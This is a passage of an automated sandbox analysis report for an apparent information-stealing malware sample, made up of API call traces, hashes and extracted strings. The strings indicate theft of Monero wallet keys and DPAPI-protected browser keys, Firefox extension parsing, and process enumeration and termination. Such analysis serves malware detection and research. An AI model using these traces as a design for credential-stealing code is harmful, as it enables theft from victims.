                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocLocal
                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                          • API String ID: 4171519190-1096346117
                          • Opcode ID: b369296cfc4ee280100b222e13de4530963e1e4850369825526ebdd8134ae502
                          • Instruction ID: b749c9b9b6792fb8b66a3830b385676b102a66e5025676c4cb0a3df015646723
                          • Opcode Fuzzy Hash: b369296cfc4ee280100b222e13de4530963e1e4850369825526ebdd8134ae502
                          • Instruction Fuzzy Hash: D1616371A10258EFDB24EFA4DC96FED7775AF54700F408018F90A9F191EB746A05CB92
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00137E37
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00137E3E
                          • RegOpenKeyExA.ADVAPI32(80000002,00EFC2C0,00000000,00020119,?), ref: 00137E5E
                          • RegQueryValueExA.ADVAPI32(?,00F0E270,00000000,00000000,000000FF,000000FF), ref: 00137E7F
                          • RegCloseKey.ADVAPI32(?), ref: 00137E92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 06b96a86d5a162e464c726aafdf83aa3e7a5252136e4697dcc3443651ea50627
                          • Instruction ID: 300154db61fed61d19e809db2e72df4dc850fdf6d2aa0bd9902ab75fce717684
                          • Opcode Fuzzy Hash: 06b96a86d5a162e464c726aafdf83aa3e7a5252136e4697dcc3443651ea50627
                          • Instruction Fuzzy Hash: B7114CB1A44605EBDB15CF95DD49FBBBBBCEB48B10F108169F605A7280D7B468008FA2
                          APIs
                          • StrStrA.SHLWAPI(00F0F068,?,?,?,0013140C,?,00F0F068,00000000), ref: 0013926C
                          • lstrcpyn.KERNEL32(0036AB88,00F0F068,00F0F068,?,0013140C,?,00F0F068), ref: 00139290
                          • lstrlen.KERNEL32(?,?,0013140C,?,00F0F068), ref: 001392A7
                          • wsprintfA.USER32 ref: 001392C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001212B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 001212BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001212D7
                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001212F5
                          • RegCloseKey.ADVAPI32(?), ref: 001212FF
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00136663
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00136726
                          • ExitProcess.KERNEL32 ref: 00136755
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00140E28,00000000,?), ref: 0013882F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00138836
                          • wsprintfA.USER32 ref: 00138850
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0013951E,00000000), ref: 00138D5B
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00138D62
                          • wsprintfW.USER32 ref: 00138D78
                          Similarity
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                            • Part of subcall function 00138B60: GetSystemTime.KERNEL32(00140E1A,00F0EC08,001405AE,?,?,001213F9,?,0000001A,00140E1A,00000000,?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 00138B86
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0012A2E1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 0012A3FF
                          • lstrlen.KERNEL32(00000000), ref: 0012A6BC
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                          • DeleteFileA.KERNEL32(00000000), ref: 0012A743
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                            • Part of subcall function 00138B60: GetSystemTime.KERNEL32(00140E1A,00F0EC08,001405AE,?,?,001213F9,?,0000001A,00140E1A,00000000,?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 00138B86
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0012D481
                          • lstrlen.KERNEL32(00000000), ref: 0012D698
                          • lstrlen.KERNEL32(00000000), ref: 0012D6AC
                          • DeleteFileA.KERNEL32(00000000), ref: 0012D72B
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                            • Part of subcall function 00138B60: GetSystemTime.KERNEL32(00140E1A,00F0EC08,001405AE,?,?,001213F9,?,0000001A,00140E1A,00000000,?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 00138B86
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0012D801
                          • lstrlen.KERNEL32(00000000), ref: 0012D99F
                          • lstrlen.KERNEL32(00000000), ref: 0012D9B3
                          • DeleteFileA.KERNEL32(00000000), ref: 0012DA32
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          APIs
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                            • Part of subcall function 001299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001299EC
                            • Part of subcall function 001299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00129A11
                            • Part of subcall function 001299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00129A31
                            • Part of subcall function 001299C0: ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
                            • Part of subcall function 001299C0: LocalFree.KERNEL32(0012148F), ref: 00129A90
                            • Part of subcall function 001299C0: CloseHandle.KERNEL32(000000FF), ref: 00129A9A
                            • Part of subcall function 00138E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00138E52
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00141580,00140D92), ref: 0012F54C
                          • lstrlen.KERNEL32(00000000), ref: 0012F56B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 998311485-3310892237
                          • Opcode ID: 3bd715fe8655244bb68249ee062c14270563e4b2f26bef0abbe2a7a4ffccde74
                          • Instruction ID: b55d72606e14c63905c0263a9cf55cade023cdc2bec841cd2c73fbefa65b76a8
                          • Opcode Fuzzy Hash: 3bd715fe8655244bb68249ee062c14270563e4b2f26bef0abbe2a7a4ffccde74
                          • Instruction Fuzzy Hash: 1B51E171D10108ABDB04FBF4EC96DED7379AF64300F808568F956A7191EF346A19CBA2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: efb45d82d467782c6df09295ca0aab25cb73ab3187078c22497121c27a78e8aa
                          • Instruction ID: 2b32859e5a04d0059d99c467dcc82f8fbf9882750328cd8e33d60c3be5d0f56c
                          • Opcode Fuzzy Hash: efb45d82d467782c6df09295ca0aab25cb73ab3187078c22497121c27a78e8aa
                          • Instruction Fuzzy Hash: 404172B1D10109AFCB04EFE5D886AFEB774AF58304F408418F51677251DB75AA09CFA6
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 001299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001299EC
                            • Part of subcall function 001299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00129A11
                            • Part of subcall function 001299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00129A31
                            • Part of subcall function 001299C0: ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
                            • Part of subcall function 001299C0: LocalFree.KERNEL32(0012148F), ref: 00129A90
                            • Part of subcall function 001299C0: CloseHandle.KERNEL32(000000FF), ref: 00129A9A
                            • Part of subcall function 00138E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00138E52
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00129D39
                            • Part of subcall function 00129AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00124EEE,00000000,00000000), ref: 00129AEF
                            • Part of subcall function 00129AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00124EEE,00000000,?), ref: 00129B01
                            • Part of subcall function 00129AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00124EEE,00000000,00000000), ref: 00129B2A
                            • Part of subcall function 00129AC0: LocalFree.KERNEL32(?,?,?,?,00124EEE,00000000,?), ref: 00129B3F
                            • Part of subcall function 00129B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00129B84
                            • Part of subcall function 00129B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00129BA3
                            • Part of subcall function 00129B60: LocalFree.KERNEL32(?), ref: 00129BD3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          • Opcode ID: 3112ef02bceb47c033068df752053ad57e084e232e991cc7df1039df942613db
                          • Instruction ID: 6bc474804d43d7b9a743fb275bb4b4449dae1366dbd174631add2e92c1197dfb
                          • Opcode Fuzzy Hash: 3112ef02bceb47c033068df752053ad57e084e232e991cc7df1039df942613db
                          • Instruction Fuzzy Hash: 9C3141B6D1021DABCF04DBE8EC85FEE77B8AF58304F144518E905A7241E7749A54CBA1
                          APIs
                          • memset.MSVCRT ref: 001394EB
                            • Part of subcall function 00138D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0013951E,00000000), ref: 00138D5B
                            • Part of subcall function 00138D50: RtlAllocateHeap.NTDLL(00000000), ref: 00138D62
                            • Part of subcall function 00138D50: wsprintfW.USER32 ref: 00138D78
                          • OpenProcess.KERNEL32(00001001,00000000,?), ref: 001395AB
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 001395C9
                          • CloseHandle.KERNEL32(00000000), ref: 001395D6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                          • String ID:
                          • API String ID: 3729781310-0
                          • Opcode ID: 299013be0226543dc58095c042bc90a3520e1d3fa3a5acea19095a7f056d2af1
                          • Instruction ID: 8e987732d45b8e9c08b1cc00a429c3009437ef5764be51de9f9f61335280c9bb
                          • Opcode Fuzzy Hash: 299013be0226543dc58095c042bc90a3520e1d3fa3a5acea19095a7f056d2af1
                          • Instruction Fuzzy Hash: 87310A71E00208AFDB15DBE0DD49BEDB778EF54700F108559E506AB184DBB4AA89CF52
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001405B7), ref: 001386CA
                          • Process32First.KERNEL32(?,00000128), ref: 001386DE
                          • Process32Next.KERNEL32(?,00000128), ref: 001386F3
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                          • CloseHandle.KERNEL32(?), ref: 00138761
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: bf8071f652ef7841f4cc3299d500f7ed52a4139b731ab474d8aa5c6757a25477
                          • Instruction ID: daddc130a7366ff92a93d048a902fa16e988096b1ab6040cabcdab4ac9f762c1
                          • Opcode Fuzzy Hash: bf8071f652ef7841f4cc3299d500f7ed52a4139b731ab474d8aa5c6757a25477
                          • Instruction Fuzzy Hash: 96316871901218ABCB25EF90DC91FEEB778EF59700F5081A9F10AB21A0DB706A45CFA1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00140E00,00000000,?), ref: 001379B0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 001379B7
                          • GetLocalTime.KERNEL32(?,?,?,?,?,00140E00,00000000,?), ref: 001379C4
                          • wsprintfA.USER32 ref: 001379F3
                          Memory Dump Source
